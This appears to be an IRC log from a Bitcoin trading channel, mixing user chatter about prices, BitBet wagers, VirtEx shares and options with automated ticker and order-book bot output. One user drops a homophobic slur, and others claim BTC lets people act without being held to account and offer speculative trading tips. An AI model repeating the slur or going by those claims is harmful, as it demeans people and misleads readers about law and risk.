moody with the sound up loud Apr 09 15:43:39 Bugpowder - yes Apr 09 15:43:47 and cursing yourself for not having enough coins Apr 09 15:43:51 FUCKKKKK Apr 09 15:43:51 "i feel like im dying, or maybe dead. in incredible agony now." Apr 09 15:44:05 210 Apr 09 15:44:11 "Do I have depression, or is this all just hormones?" Apr 09 15:44:16 lmao Apr 09 15:44:22 is there a difference? Apr 09 15:44:31 asciilifeform - ah, yes, i hadn't quite realized that you could do that. It's an unregulated marekt Apr 09 15:45:06 Bugpowder ikr Apr 09 15:45:29 Bugpowder - point. Apr 09 15:45:29 http://chatt.hdsb.ca/~kozborj/images/whatisntchemistry.gif Apr 09 15:45:30 Insaneatyou you can do that in the regulated market too. Apr 09 15:45:43 lol Apr 09 15:45:48 physicds Apr 09 15:45:50 Thought bots were illegal? Apr 09 15:45:54 wat? Apr 09 15:46:19 question : how old are you? Apr 09 15:46:43 someone posted a topic that they;ll invest 100k in btc Apr 09 15:46:49 this is from a gaming forum Apr 09 15:46:49 wow Apr 09 15:47:28 great, thanks to him the price rises Apr 09 15:47:33 huh Apr 09 15:47:35 Sad that they will have less than 500 BTC Apr 09 15:47:36 Insaneatyou: you can do pretty much what you want with BTC without being made to answer for it, if you have half a brain. plenty of people are. Apr 09 15:47:49 Insaneatyou: how old are you? seriously. Apr 09 15:47:51 bugpowder 24 Apr 09 15:48:08 ok, well you have got a shitload of reading to do about economics and markets Apr 09 15:48:16 asciilifeform yeah, i get that now Apr 09 15:48:26 although bitcoin is a great place to lear Apr 09 15:48:33 bugpowder yah, no joke Apr 09 15:48:43 who would make anything illegal? Apr 09 15:48:54 also, bots are legal in every financial market as of right now Apr 09 15:48:56 but the best lessons occur when you lose all your money Apr 09 15:49:06 at least at the beginning. Apr 09 15:49:06 MJR_ in a regulated market in fiat I thought writing bots to trade for you was illegal Apr 09 15:49:16 Insaneatyou: stop talking to us and go read. Start with Satoshi's paper and go on to the discussions of great scams in the fora, and the various practical details of BTC dealings Apr 09 15:49:30 Insaneatyou: 90% of the trades on exchanges are bots trading with each other. Apr 09 15:49:54 asciilifeform i've read Satoshi's paper, but i see the point. Apr 09 15:50:04 ;;bc,24hprc Apr 09 15:50:07 Bugpowder yah, now i realise it's just expensive Apr 09 15:50:07 188.56 Apr 09 15:50:46 your best chance of getting coins is to buy a put, and pray bitcoins crash to $5. Apr 09 15:50:51 within the next 2 weeks. Apr 09 15:50:54 the 200 BTC bet isnt paid out yet eh? Apr 09 15:51:00 asciilifeform one quick question - "great scams in the fora"? Apr 09 15:51:06 I read forums for 2 years before piping up here and (as people here can verify) I'm still pretty much a bitcoin idiot. Apr 09 15:51:13 read MPs blog Apr 09 15:51:15 fora = the forums Apr 09 15:51:35 Bugpowder sounds like a quick way to lose my ass Apr 09 15:51:47 http://trilema.com/2012/the-bitcoin-drama-timeline/ Apr 09 15:51:47 Insaneatyou: exactly Apr 09 15:51:50 Insaneatyou: read about Pirate, GLBSE, etc. Apr 09 15:52:14 asciilifeform for what purpose? Apr 09 15:52:41 stupid question that Apr 09 15:53:00 To understand the many ways you can lose money with Bitcoin... I could write a book Apr 09 15:53:01 so mp, any reason why bitbet hasnt paid out yet Apr 09 15:53:01 unbalanced_ then i intend to not be you Apr 09 15:53:05 for the 200 BTC bet Apr 09 15:53:05 Learn from other's mistakes Apr 09 15:53:13 Why try to learn when you already know how to solve complex problems? Apr 09 15:53:23 or kako/satoshi/god ect does that Apr 09 15:53:24 buy some puts, and learn. Apr 09 15:53:34 Insaneatyou: that's a good start :) Apr 09 15:54:04 I should try that, not be me... it worked for George Costanza. Apr 09 15:54:29 unbalanced_ sounds like you need this link too: http://www.reddit.com/r/depression/ Apr 09 15:54:48 one final thing boys, where's the forums? Apr 09 15:55:51 this is the internet, no males here Apr 09 15:57:04 bowjob probably there were some fags or communists among the beneficiaries and we have to scrub the lists Apr 09 15:57:25 Self deprecation <> depression. I'm just trying to be polite. Apr 09 15:57:29 mornin Apr 09 15:57:30 ah i see isee. take your time Apr 09 15:57:31 http://mobile.blogs.wsj.com/cio/2013/04/08/cios-watching-bitcoin-evolution/ Apr 09 15:57:53 unbalanced_ apologies then Apr 09 15:58:01 maybe add a rule that if they try to game the system after an event occurs, the btc shall be kept and distributed to shareholders Apr 09 15:58:04 [HAVELOCK] [SDICE] 8 @ 0.25 = 2 BTC [-] Apr 09 15:58:05 who the fuck asked "cios" Apr 09 15:58:21 bowjob rule 18 or w/e that was. Apr 09 15:58:28 [MPEX] [S.DICE] 900 @ 0.00302126 = 2.7191 BTC [-] Apr 09 15:58:35 Insaneatyou: Google is your friend... try typing "bitcoin forum" over there. Apr 09 15:58:55 (SOrry took a while to find a non paywall version of article) Apr 09 15:59:03 [HAVELOCK] [VTX] 1 @ 0.202 BTC [-] Apr 09 15:59:04 [HAVELOCK] [VTX] 2 @ 0.2012 = 0.4024 BTC [-] Apr 09 15:59:05 [HAVELOCK] [VTX] 20 @ 0.20100001 = 4.02 BTC [-] Apr 09 15:59:07 [HAVELOCK] [VTX] 4 @ 0.201 = 0.804 BTC [-] Apr 09 15:59:25 poor poor VTX Apr 09 15:59:33 ya srsly, we know what happened there ? Apr 09 15:59:38 fallen from such great heights Apr 09 15:59:48 my working theory, Apr 09 16:00:11 is that many shareholders that bought over IPO price, Apr 09 16:00:13 were flippers Apr 09 16:00:22 unbalanced_ thanks Apr 09 16:00:22 many whom held out too long Apr 09 16:00:24 and then Apr 09 16:00:32 now that's a distinct possibility. Apr 09 16:00:35 i suspect that people just realized there are no divs Apr 09 16:00:39 "Do not send BTC after betting has closed. Any BTC sent to addresses allocated to a bet after betting has closed will be kept by BitBet and distributed to shareholders as dividends. " Apr 09 16:00:40 many more "daytraders" than investors in btc yet. Apr 09 16:00:42 Golden Apr 09 16:01:28 you think they;d realize that there'd be no divs before pouring BTC in Apr 09 16:02:05 you'd think Apr 09 16:02:07 or maybe they realized, just hoping others would buy it via greater fool theory Apr 09 16:02:19 greater greater fools eh Apr 09 16:02:23 it doesnt relaly hurt virtex Apr 09 16:02:26 *really Apr 09 16:02:38 since they got th emoney already, their 300k Apr 09 16:02:40 also arent the coins way overpriced there? Apr 09 16:02:50 well, the market decides Apr 09 16:03:04 its 219 per coin last time i checked Apr 09 16:03:15 and 3% fee, going down if you trade more Apr 09 16:06:15 [BTCTC] [ASICMINER-PT] 1 @ 0.77489 BTC [-] Apr 09 16:07:06 [BTCTC] [ASICMINER-PT] 1 @ 0.7749 BTC [+] Apr 09 16:07:26 [MPEX] [S.DICE] 5103 @ 0.00302126 = 15.4175 BTC [-] Apr 09 16:08:04 [HAVELOCK] [SDICE] 51 @ 0.25 = 12.75 BTC [-] Apr 09 16:08:07 some nice arb there Apr 09 16:08:09 :) Apr 09 16:09:13 [BTCTC] [GSDPT] 17 @ 0.003 = 0.051 BTC [-] Apr 09 16:09:16 [BTCTC] [GSDPT] 17 @ 0.003 = 0.051 BTC [-] Apr 09 16:09:18 [BTCTC] [GSDPT] 400 @ 0.00286 = 1.144 BTC [-] Apr 09 16:09:20 aight. who got squeezed by virtex here Apr 09 16:09:21 [BTCTC] [GSDPT] 59 @ 0.002856 = 0.1685 BTC [-] Apr 09 16:09:24 [BTCTC] [GSDPT] 71 @ 0.002855 = 0.2027 BTC [-] Apr 09 16:09:26 [BTCTC] [GSDPT] 30 @ 0.00285 = 0.0855 BTC [-] Apr 09 16:09:28 [BTCTC] [GSDPT] 4 @ 0.00284 = 0.0114 BTC [-] Apr 09 16:09:31 us mint rationing sales nao. Apr 09 16:09:31 [BTCTC] [GSDPT] 1500 @ 0.002801 = 4.2015 BTC [-] Apr 09 16:09:32 la la la Apr 09 16:09:33 [BTCTC] [GSDPT] 18 @ 0.0028 = 0.0504 BTC [-] Apr 09 16:09:36 [BTCTC] [GSDPT] 1000 @ 0.0028 = 2.8 BTC [-] Apr 09 16:11:06 [HAVELOCK] [SDICE] 28 @ 0.25 = 7 BTC [-] Apr 09 16:12:11 the fiat value of vtx shares is $44.. still good Apr 09 16:12:20 from its 30 dollar ipo value Apr 09 16:13:46 Signs that you know you made a bad btc deal,1. You start rationalizing in fiat Apr 09 16:14:40 I did not touch VTX lol, im not crying. Apr 09 16:15:11 true tho, who cares about fiat. Apr 09 16:15:25 they will start issuing dividends q3 Apr 09 16:15:32 i didnt see that in the prospectus Apr 09 16:15:54 the prosp merely says, IF we start issuing divs, we'll give you some Apr 09 16:16:01 no real commitment Apr 09 16:17:50 blockchain.info down Apr 09 16:17:53 ;;goxlag Apr 09 16:17:54 MtGox lag is 0.573548 seconds. During this time, light travels 0.00114938377024 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 09 16:17:59 ;;ticker Apr 09 16:18:00 BTCUSD ticker | Best bid: 206.62620, Best ask: 206.80000, Bid-ask spread: 0.17380, Last trade: 206.80000, 24 hour volume: 105756.02146466, 24 hour low: 172.13000, 24 hour high: 210.00000, 24 hour vwap: 190.26993 Apr 09 16:18:35 I wonder how many people sent BTC in after the bet closed Apr 09 16:18:40 on the 200 BTC in april bet Apr 09 16:18:47 many i hope Apr 09 16:18:53 ive seen a few, not sure how much in btc Apr 09 16:19:01 its gonna be juicy divs Apr 09 16:19:02 well i dont really wish ill will Apr 09 16:19:03 [HAVELOCK] [SDICE] 4 @ 0.25 = 1 BTC [-] Apr 09 16:19:05 but cmon Apr 09 16:19:17 it used to be refunded so that rule must be there Apr 09 16:19:32 recently Apr 09 16:20:04 [HAVELOCK] [SDICE] 18 @ 0.25 = 4.5 BTC [-] Apr 09 16:20:25 aye, i see the btc from bitbet. thx a bunch Apr 09 16:22:01 ThickAsThieves: it's up Apr 09 16:22:04 Free. Open Source. $ 6,485,491,563.34 Successfully Transacted. Apr 09 16:22:09 inb4 government takedown Apr 09 16:22:16 thx Apr 09 16:22:56 Scrat whassat ? Apr 09 16:23:21 "nevermind me, im just a 1man operation that has moved $6 billion" Apr 09 16:23:26 http://polimedia.us/dtng/c/src/136551374562.jpg the new bitcoin police cruiser. Apr 09 16:23:32 [BTCTC] [S.MPOE-PT] 1 @ 0.000648 BTC [-] Apr 09 16:23:39 mircea_popescu: scroll down https://blockchain.info/wallet/ Apr 09 16:24:03 oh. yeah. Apr 09 16:24:25 [BTCTC] [S.MPOE-PT] 1 @ 0.000607 BTC [-] Apr 09 16:24:36 everybody is all excited about tghe 100/200/whatever. Apr 09 16:24:49 so 300 next week? Apr 09 16:24:52 what they seem to not think too much about is that the more oil you find, the larger an army you need. Apr 09 16:25:07 sorta like the people who just build settlers in civ Apr 09 16:25:13 then get owned by gingis khan Apr 09 16:25:45 thick, why so bearish Apr 09 16:25:47 500 Apr 09 16:25:47 brah Apr 09 16:26:55 ;;ticker Apr 09 16:26:57 BTCUSD ticker | Best bid: 206.40000, Best ask: 207.00000, Bid-ask spread: 0.60000, Last trade: 207.00000, 24 hour volume: 105765.49944185, 24 hour low: 172.13000, 24 hour high: 210.00000, 24 hour vwap: 190.28382 Apr 09 16:27:11 gingis khan, the red-headed, gum-diseased conqueror Apr 09 16:27:17 lol mircea_popescu ... you tried the ipad version? civ revolution. only game i can play. Apr 09 16:27:29 best for travelling 3-5 hours to win. Apr 09 16:27:29 im playing poe atm Apr 09 16:27:36 poe? Apr 09 16:27:49 http://trilema.com/2013/path-of-exile-story-continued/ Apr 09 16:29:24 ;;nethash Apr 09 16:29:25 63617.6030711 Apr 09 16:29:28 ;;estimate Apr 09 16:29:30 Next difficulty estimate | 8989778.42737 based on data since last change | 8887140.87338 based on data for last three days Apr 09 16:29:43 hm Apr 09 16:29:47 need more hashes! Apr 09 16:29:49 first screenshot reminds of diable Apr 09 16:29:52 diablo Apr 09 16:30:13 thats as far as my knowledge goes Apr 09 16:30:21 it is kinda made by stealing everything that works Apr 09 16:30:24 so a lot of diablo in there Apr 09 16:30:49 [MPEX] [S.MPOE] 14800 @ 0.00068531 = 10.1426 BTC [-] Apr 09 16:30:51 [MPEX] [S.MPOE] 900 @ 0.00068516 = 0.6166 BTC [-] Apr 09 16:30:57 diablo 3 was a fail game of the year Apr 09 16:31:01 waste of money Apr 09 16:31:02 then get owned by gingis khan << that's why you play as Victoria and build a bunch of archers Apr 09 16:31:13 imsaguy i don't see anyone building archers. Apr 09 16:31:14 shoot the bastages in the eye! Apr 09 16:31:17 D3 did suck Apr 09 16:31:23 i see piuk going "heyyo i sent 7\bn wiorth of monyz" Apr 09 16:31:33 mircea_popescu, because everyone knows you don't expose your archers Apr 09 16:31:36 yeah, d3 was a faiul. Apr 09 16:31:46 imsaguy a ok than. my bad. Apr 09 16:32:17 what good is a defender that can get knocked down with a rock if fully exposed? Apr 09 16:32:55 meanwhile, I wait for the bubble to pop and nobody stickign around to try to catch the bathwater Apr 09 16:37:29 [BTCTC] [ESECURITYSABTC] 1 @ 0.20001 BTC [-] Apr 09 16:39:23 [BTCTC] [LTC-MINING] 1 @ 0.24001 BTC [+] Apr 09 16:39:25 [BTCTC] [LTC-MINING] 2 @ 0.24 = 0.48 BTC [-] Apr 09 16:40:15 [BTCTC] [SYNERGY] 1 @ 0.00651 BTC [-] Apr 09 16:42:16 ;;asks 9999999999 Apr 09 16:42:19 There are currently 35778.387 bitcoins offered at or under 9999999999.0 USD, worth 14046355227.6 USD in total. | Data vintage: 0.0017 seconds Apr 09 16:42:21 ;;bids 0 Apr 09 16:42:21 There are currently 32306655 bitcoins demanded at or over 0.0 USD, worth 13562707.0394 USD in total. | Data vintage: 2.2427 seconds Apr 09 16:42:28 yikes Apr 09 16:42:50 we're in for some serious movement up still Apr 09 16:43:28 ;;goxlag Apr 09 16:43:32 MtGox lag is 60.400741 seconds. During this time, light travels 0.121042408684 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 09 16:43:52 210 will go down today Apr 09 16:44:03 ;;asks 210 Apr 09 16:44:03 There are currently 1210.0012 bitcoins offered at or under 210.0 USD, worth 254025.162912 USD in total. | Data vintage: 104.2441 seconds Apr 09 16:44:18 ;;asks 215 Apr 09 16:44:19 There are currently 2304.5749 bitcoins offered at or under 215.0 USD, worth 487074.216038 USD in total. | Data vintage: 119.9149 seconds Apr 09 16:44:26 ;;asks 220 Apr 09 16:44:27 There are currently 3598.1747 bitcoins offered at or under 220.0 USD, worth 768176.646754 USD in total. | Data vintage: 0.0011 seconds Apr 09 16:44:34 ! Apr 09 16:45:05 $avg Apr 09 16:45:12 ThickAsThieves: 189.42 Apr 09 16:46:28 [BTCTC] [COGNITIVE] 6 @ 0.12 = 0.72 BTC [-] Apr 09 16:46:31 [BTCTC] [COGNITIVE] 1 @ 0.1195 BTC [-] Apr 09 16:46:34 [BTCTC] [COGNITIVE] 5 @ 0.1192 = 0.596 BTC [-] Apr 09 16:46:38 [BTCTC] [COGNITIVE] 5 @ 0.1191 = 0.5955 BTC [-] Apr 09 16:46:41 [BTCTC] [COGNITIVE] 1 @ 0.119 BTC [-] Apr 09 16:46:44 [BTCTC] [COGNITIVE] 70 @ 0.118 = 8.26 BTC [-] Apr 09 16:46:45 [BTCTC] [COGNITIVE] 13 @ 0.11712 = 1.5226 BTC [-] Apr 09 16:46:48 [BTCTC] [COGNITIVE] 20 @ 0.11711 = 2.3422 BTC [-] Apr 09 16:49:44 [BTCTC] [RSM] 360 @ 0.001033 = 0.3719 BTC [-] Apr 09 16:49:46 [MPEX] [O.USD.C158T] 10 @ 0.30600383 = 3.06 BTC [+] Apr 09 16:50:15 [MPEX] [O.USD.C161T] 5 @ 0.2946322 = 1.4732 BTC [+] Apr 09 16:50:57 [MPEX] [O.USD.C170T] 5 @ 0.26251706 = 1.3126 BTC Apr 09 16:51:22 ;;rate bitstamp -1 tards Apr 09 16:51:22 Error: For identification purposes, you must be authenticated to use the rating system. Apr 09 16:51:26 [MPEX] [O.USD.C164T] 5 @ 0.28359474 = 1.418 BTC [+] Apr 09 16:51:35 [BTCTC] [LTC-MINING] 2 @ 0.24 = 0.48 BTC [-] Apr 09 16:51:53 [MPEX] [O.USD.C167T] 5 @ 0.27289023 = 1.3645 BTC [+] Apr 09 16:53:00 [MPEX] [O.USD.C173T] 10 @ 0.25247337 = 2.5247 BTC Apr 09 16:55:05 ;;asks 231.39 Apr 09 16:55:07 There are currently 4830.2361 bitcoins offered at or under 231.39 USD, worth 1057565.65945 USD in total. | Data vintage: 0.0011 seconds Apr 09 16:55:21 ;;asks 250 Apr 09 16:55:21 There are currently 8423.8545 bitcoins offered at or under 250.0 USD, worth 1934423.80375 USD in total. | Data vintage: 13.8790 seconds Apr 09 16:55:32 ;;bids 0 Apr 09 16:55:33 There are currently 32316727 bitcoins demanded at or over 0.0 USD, worth 13548257.8426 USD in total. | Data vintage: 25.9812 seconds Apr 09 16:57:00 [BTCTC] [BITVPS] 2 @ 0.00103 = 0.0021 BTC [-] Apr 09 16:57:03 [BTCTC] [BITVPS] 13 @ 0.00102 = 0.0133 BTC [-] Apr 09 16:57:06 [BTCTC] [BITVPS] 10 @ 0.001 = 0.01 BTC [-] Apr 09 16:57:09 [BTCTC] [BITVPS] 1 @ 0.001 BTC [-] Apr 09 16:57:52 [MPEX] [S.MPOE] 5240 @ 0.00068516 = 3.5902 BTC [-] Apr 09 16:58:18 ;;ticker Apr 09 16:58:19 BTCUSD ticker | Best bid: 210.00000, Best ask: 210.44622, Bid-ask spread: 0.44622, Last trade: 210.44622, 24 hour volume: 106279.45771713, 24 hour low: 172.13000, 24 hour high: 210.00000, 24 hour vwap: 190.68842 Apr 09 16:59:23 [MPEX] [O.USD.C200T] 400 @ 0.17758558 = 71.0342 BTC [+] Apr 09 17:00:04 [HAVELOCK] [VTX] 6 @ 0.201 = 1.206 BTC [-] Apr 09 17:00:17 [BTCTC] [S.MPOE-PT] 5 @ 0.000648 = 0.0032 BTC [+] Apr 09 17:00:25 [MPEX] [O.USD.C200T] 50 @ 0.17758558 = 8.8793 BTC [+] Apr 09 17:00:28 [BTCTC] [S.MPOE-PT] 57 @ 0.000649 = 0.037 BTC [+] Apr 09 17:00:35 [BTCTC] [S.MPOE-PT] 28 @ 0.000655 = 0.0183 BTC [+] Apr 09 17:01:02 bitbet betters are pretty small-time huh Apr 09 17:01:04 [HAVELOCK] [VTX] 1 @ 0.20061111 BTC [-] Apr 09 17:01:05 [HAVELOCK] [VTX] 8 @ 0.20061111 = 1.6049 BTC [-] Apr 09 17:01:20 taub i seem to recall a 90 btc bet yest Apr 09 17:01:34 afaik plenty of places even in vegas will turn down a 15k bet. Apr 09 17:01:47 well they arent p2p Apr 09 17:02:01 they offer fixed odds Apr 09 17:02:04 [HAVELOCK] [VTX] 1 @ 0.20061111 BTC [-] Apr 09 17:02:05 [HAVELOCK] [VTX] 18 @ 0.21 = 3.78 BTC [+] Apr 09 17:02:27 no i mean on betting Apr 09 17:02:38 [MPEX] [O.USD.C200T] 50 @ 0.17758558 = 8.8793 BTC [+] Apr 09 17:03:04 [HAVELOCK] [VTX] 4 @ 0.20011 = 0.8004 BTC [-] Apr 09 17:03:05 [HAVELOCK] [VTX] 1 @ 0.2001 BTC [-] Apr 09 17:03:06 [HAVELOCK] [VTX] 5 @ 0.2 = 1 BTC [-] Apr 09 17:03:07 [HAVELOCK] [VTX] 7 @ 0.2 = 1.4 BTC [-] Apr 09 17:03:08 yea me too, i mean unless it's a betting exchange, the cointerparty is the house Apr 09 17:03:12 so of course they limit their size Apr 09 17:03:28 this is a spurious argument. Apr 09 17:03:38 fact is, ion bitbet people in fact bet 15k in one go Apr 09 17:03:44 on other places, such as vegas joints, they can not. Apr 09 17:04:00 thus, vegas is indeed smalltime. Apr 09 17:04:14 well Apr 09 17:04:26 [MPEX] [O.USD.C200T] 34 @ 0.17758558 = 6.0379 BTC [+] Apr 09 17:05:12 211 Apr 09 17:05:54 $vwap ^oix Apr 09 17:05:55 mircea_popescu: ^OIX 1 day: no data 7 day: average: 147.08078325 high: 181.60130255 low: 110.64241833 volume: 19536 btc: 4621.81435971 30 day: no data Apr 09 17:06:49 $avg Apr 09 17:06:50 taub: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 09 17:07:00 [BTCTC] [S.DICE-PT] 35 @ 0.00361 = 0.1264 BTC [-] Apr 09 17:07:13 [BTCTC] [S.DICE-PT] 2 @ 0.0036 = 0.0072 BTC [-] Apr 09 17:07:17 [BTCTC] [S.DICE-PT] 12 @ 0.003301 = 0.0396 BTC [-] Apr 09 17:07:18 $vwap Apr 09 17:07:19 taub: http://pastebin.com/raw.php?i=LUS8vrji Apr 09 17:07:22 [BTCTC] [S.DICE-PT] 1000 @ 0.0033 = 3.3 BTC [-] Apr 09 17:07:24 [BTCTC] [S.DICE-PT] 90 @ 0.00321 = 0.2889 BTC [-] Apr 09 17:07:27 [BTCTC] [S.DICE-PT] 760 @ 0.0032 = 2.432 BTC [-] Apr 09 17:08:52 hey i see options that dont exist yet! Apr 09 17:08:59 in that pastebin Apr 09 17:09:48 hurry up Bug, before all the options are gone! ;) Apr 09 17:09:54 it shows both the expired style and the current style Apr 09 17:10:00 ah Apr 09 17:10:02 [BTCTC] [S.DICE-PT] 100 @ 0.004 = 0.4 BTC [+] Apr 09 17:10:11 because it still has data on the old ones Apr 09 17:10:23 got it Apr 09 17:11:01 ;;asks 99999999 Apr 09 17:11:02 There are currently 33781.073 bitcoins offered at or under 99999999.0 USD, worth 432570432.615 USD in total. | Data vintage: 84.5329 seconds Apr 09 17:11:04 ;;bids 0 Apr 09 17:11:05 There are currently 32087038 bitcoins demanded at or over 0.0 USD, worth 13163031.4903 USD in total. | Data vintage: 87.4622 seconds Apr 09 17:11:24 ;;asks 240 Apr 09 17:11:25 There are currently 4794.2223 bitcoins offered at or under 240.0 USD, worth 1076900.03865 USD in total. | Data vintage: 107.5441 seconds Apr 09 17:11:27 I don't have any more capital out of deep storage Apr 09 17:11:39 I shot my wad at the beginning of the month Apr 09 17:11:44 looks like we're poised to skyrocket Apr 09 17:11:46 and am holding till the end Apr 09 17:11:58 15% of net in calls. Apr 09 17:12:04 not going over. Apr 09 17:12:12 i've been buying daily pretty much Apr 09 17:12:14 except the calls are appreciating Apr 09 17:12:23 so now I'm way over Apr 09 17:12:32 [MPEX] [S.DICE] 500 @ 0.00280001 = 1.4 BTC [-] Apr 09 17:12:34 [MPEX] [S.DICE] 1500 @ 0.0028 = 4.2 BTC [-] Apr 09 17:12:36 [MPEX] [S.DICE] 500 @ 0.00270004 = 1.35 BTC [-] Apr 09 17:12:39 [MPEX] [S.DICE] 1000 @ 0.00270003 = 2.7 BTC [-] Apr 09 17:12:41 [MPEX] [S.DICE] 3 @ 0.00270002 = 0.0081 BTC [-] Apr 09 17:12:43 [MPEX] [S.DICE] 100 @ 0.00270001 = 0.27 BTC [-] Apr 09 17:12:44 [MPEX] [S.DICE] 39397 @ 0.0027 = 106.3719 BTC [-] Apr 09 17:13:17 tahts a lotta sdice Apr 09 17:13:44 Well not that much... Apr 09 17:14:03 oh man I lost so much money on seals Apr 09 17:14:07 last year Apr 09 17:14:38 yeah... I lost over 10 grand apparently Apr 09 17:14:49 >30k. Apr 09 17:14:55 oops Apr 09 17:14:58 eheh Apr 09 17:15:04 stupid veganhippie Apr 09 17:15:18 I think I must have lost $10,000 in one hand against him Apr 09 17:15:18 next year it's gonna be >30 million for you Apr 09 17:15:34 [BTCTC] [GSDPT] 100 @ 0.0028 = 0.28 BTC [-] Apr 09 17:15:39 I can only hope so Apr 09 17:15:40 [BTCTC] [GSDPT] 10 @ 0.00279 = 0.0279 BTC [-] Apr 09 17:15:43 [BTCTC] [GSDPT] 34 @ 0.002781 = 0.0946 BTC [-] Apr 09 17:16:04 Where are the big time holders of coins Apr 09 17:16:08 why are they not selling? Apr 09 17:16:14 or ARE they selling? Apr 09 17:16:18 and it doesn't matter Apr 09 17:16:52 I guess the occasional dip is it... Apr 09 17:17:07 every day i look at the market figures i have to rub my eyes..doesnt make sense, thought it would have leveled out or dropped to an equilibrium Apr 09 17:17:09 Maybe there's just a lot more BTC lost forever than we thought... Apr 09 17:17:32 selling power has decreased a lot since 100 Apr 09 17:17:54 we really need to revisit that blockchain analysis of dormant coin. Apr 09 17:17:55 remember how we had those big walls before 50, 80, 100 Apr 09 17:18:09 pretty big wall at 200 too Apr 09 17:18:10 no longer Apr 09 17:18:30 Bugpowder: only miners are selling imo :) Apr 09 17:18:45 ;;ticker Apr 09 17:18:46 BTCUSD ticker | Best bid: 214.08541, Best ask: 214.38000, Bid-ask spread: 0.29459, Last trade: 214.38000, 24 hour volume: 107810.14057364, 24 hour low: 172.13000, 24 hour high: 214.00000, 24 hour vwap: 191.10771 Apr 09 17:19:03 [HAVELOCK] [VTX] 43 @ 0.2 = 8.6 BTC [-] Apr 09 17:19:16 ;;asks 240 Apr 09 17:19:19 There are currently 6178.7618 bitcoins offered at or under 240.0 USD, worth 1383401.83525 USD in total. | Data vintage: 0.0010 seconds Apr 09 17:19:23 ;;bids 0 Apr 09 17:19:23 There are currently 32307537 bitcoins demanded at or over 0.0 USD, worth 13144217.9744 USD in total. | Data vintage: 5.3656 seconds Apr 09 17:19:53 all this buying, and yet the bids continue to increase in values Apr 09 17:20:03 [HAVELOCK] [VTX] 103 @ 0.2 = 20.6 BTC [-] Apr 09 17:20:30 well, in theory Apr 09 17:20:38 that'd put bitcoin at $3 :) Apr 09 17:20:50 ;;market --sell 100000 Apr 09 17:20:51 A market order to sell 100000 bitcoins right now would net 11219765.0124 USD and would take the last price down to 36.0100 USD, resulting in an average price of 112.1977 USD/BTC. | Data vintage: 92.7004 seconds Apr 09 17:21:03 [HAVELOCK] [VTX] 6 @ 0.21 = 1.26 BTC [+] Apr 09 17:21:18 http://blockchain.info/charts/bitcoin-days-destroyed?showDataPoints=false×pan=&show_header=true&daysAverageString=7&scale=0&address= Apr 09 17:21:22 the thing is, if you are a big holder, youre better off selling in chunks Apr 09 17:21:28 looks like old coins are moving now.. Apr 09 17:21:31 ezdiy: thats lower than litecoin at the moment Apr 09 17:22:20 Bug, what is that chart? Apr 09 17:22:22 ThickAsThieves: just following the logic there are X billion of people on earth, so bitcoin must be sure worth Y Apr 09 17:22:28 "days destroyed"? Apr 09 17:22:32 ThickAsThieves: by that logic, each coin would be worth $3 now :) Apr 09 17:22:50 ezdiy i dont know what you are referring to Apr 09 17:22:51 Bitcoin days destroyed for any given transaction is calculated by taking the number of Bitcoins in a transaction and multiplying it by the number of days it has been since those coins were last spent. Apr 09 17:23:26 weird Apr 09 17:23:53 lotsa days destroyed Apr 09 17:23:56 the problem is its not volume weighted Apr 09 17:24:06 i mean tx volume Apr 09 17:24:08 $3 is lower than litcoin-> sell and buy ltc now Apr 09 17:24:08 not coin volume Apr 09 17:24:09 time to dump yo stash Bugpowder Apr 09 17:24:16 let me front run Apr 09 17:24:26 KRS-1: i think there are 11m litecoins too or something like that Apr 09 17:24:27 tollla lola lol Apr 09 17:24:27 I am a minnow Apr 09 17:24:33 given that those are generated 4 times faster Apr 09 17:24:37 ah what Apr 09 17:25:35 litecoin is just a tool for bitcoin utility Apr 09 17:25:47 mine litecoin, sell for bitcoin Apr 09 17:25:52 yup :) Apr 09 17:25:54 [MPEX] [S.MPOE] 6025 @ 0.00068861 = 4.1489 BTC [+] Apr 09 17:26:16 216 Apr 09 17:26:16 has anyone looked at herbalife? Apr 09 17:26:21 lol Apr 09 17:26:29 that is the point of torbroker Apr 09 17:26:36 anonymity Apr 09 17:26:36 wtb snake oil Apr 09 17:26:43 oh i think they are a huge scam Apr 09 17:26:48 but inside info is inside info Apr 09 17:27:00 ;;goxlag Apr 09 17:27:01 MtGox lag is 156.627681 seconds. During this time, light travels 0.313880119033 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one month (0.2988 AU). Apr 09 17:27:05 i looked at herbalife once when this stunning but obviously famished chick was trying to serll it door to door Apr 09 17:27:08 hold on to your hats Apr 09 17:27:11 lol Apr 09 17:27:19 mircea_popescu: lol Apr 09 17:27:24 fed the girl, discarded the crap, everyone happy ever after. Apr 09 17:27:32 hehehe, that is the right approach Apr 09 17:27:36 this lag is taking us upward methinks, rather than the usuall downward Apr 09 17:30:54 there's no where to go but up Apr 09 17:31:00 surely you guys have caught on by now Apr 09 17:31:12 fastcash is out of money to buy Apr 09 17:31:18 lol Apr 09 17:33:53 ;;asks 250 Apr 09 17:33:54 There are currently 7660.0099 bitcoins offered at or under 250.0 USD, worth 1787629.91563 USD in total. | Data vintage: 107.2681 seconds Apr 09 17:34:07 old coins ARE moving. http://blockchain.info/charts/bitcoin-days-destroyed-min-year?showDataPoints=false×pan=&show_header=true&daysAverageString=7&scale=0&address= Apr 09 17:34:12 ;;asks 230 Apr 09 17:34:14 There are currently 3650.8952 bitcoins offered at or under 230.0 USD, worth 813546.641479 USD in total. | Data vintage: 0.0009 seconds Apr 09 17:34:27 interesting statistic though Apr 09 17:34:40 because if they are dumping bad...if they are not hoarding good...so which will it be? Apr 09 17:34:59 well, seeing as the price is still going up and they are selling some coin off, I think its great Apr 09 17:35:09 i agree Apr 09 17:35:10 increasing the effective base Apr 09 17:35:27 more market participants Apr 09 17:35:32 move even distribution Apr 09 17:37:04 [HAVELOCK] [HIM] 1 @ 1.7 BTC [-] Apr 09 17:38:39 ;;ticker Apr 09 17:38:43 BTCUSD ticker | Best bid: 218.37900, Best ask: 218.38000, Bid-ask spread: 0.00100, Last trade: 218.38000, 24 hour volume: 107587.39057991, 24 hour low: 172.13000, 24 hour high: 218.37999, 24 hour vwap: 191.81253 Apr 09 17:38:53 this is madness Apr 09 17:39:06 nearly $30 difference between vwap and price Apr 09 17:39:22 i guess we need to start thinking % increase Apr 09 17:39:25 rather than dollars Apr 09 17:39:50 ;;bc,stats Apr 09 17:39:54 Current Blocks: 230474 | Current 